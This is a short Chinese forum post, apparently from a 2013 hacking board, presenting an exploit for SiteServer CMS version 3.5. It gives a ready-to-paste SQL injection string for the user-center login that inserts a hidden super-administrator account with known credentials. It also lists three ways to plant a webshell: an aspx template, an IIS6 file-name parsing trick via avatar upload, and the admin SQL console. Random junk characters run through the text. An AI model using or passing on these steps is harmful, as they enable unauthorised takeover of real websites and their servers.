经测试秒杀最新的3.5版3 Y7 L( O# E/ N& c6 x. S% w M" a
stieserver官网:www.siteserver.cn
) u1 L7 g$ A& i+ aEXP:
2 ]4 N( ^: z- }直接访问UserCenter/login.aspx
$ ^& e! V8 r4 I: o: s" }# X1 r用户名处输入:
% A& t2 E, Y/ s7 @0 X) T# J
2 D7 s! c0 O" C8 _123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
+ W" L; t8 V* [9 z1 ^- v密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。9 F& G: n. k7 |, O. Y1 R2 f; r% @6 F
之后再访问后台SiteServer/login.aspx用插入的用户登陆
% v! M) D! c* v) R后台拿webshell的三种方法:4 Z6 D0 D- k& t& Z* k5 \- r! |7 M
一、
. u2 t/ |; m# l' I6 ~$ q站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
7 D: v" c/ M& k二、
! _( Q4 @2 b/ t成员权限-》添加用户-》用户名为:1.asp
, f, R: S3 U& n1 Y5 Y1 n3 {http://127.0.0.1/usercenter/
3 ?9 X/ R0 `# T用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell S7 {' y6 B5 b+ ?4 B8 v
(ps:后台添加用户时不会验证是否含有非法字符)' ]* q* t) ?, A) U1 G8 [0 U5 f+ G. n! x* v
三、6 d2 B+ u" I% ~: M# N: g. P
系统工具-》实用工具-》机器参数查看0 Z3 j7 ?! b; }% B" ^- {
可以看到数据库类型、名称,WEB路径/ b3 c: U0 k* t& n+ p/ k: k
系统工具-》数据库工具-》SQL语句查询; H+ P3 i5 d* z$ C/ P/ U! }/ E
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
分享
支持
反对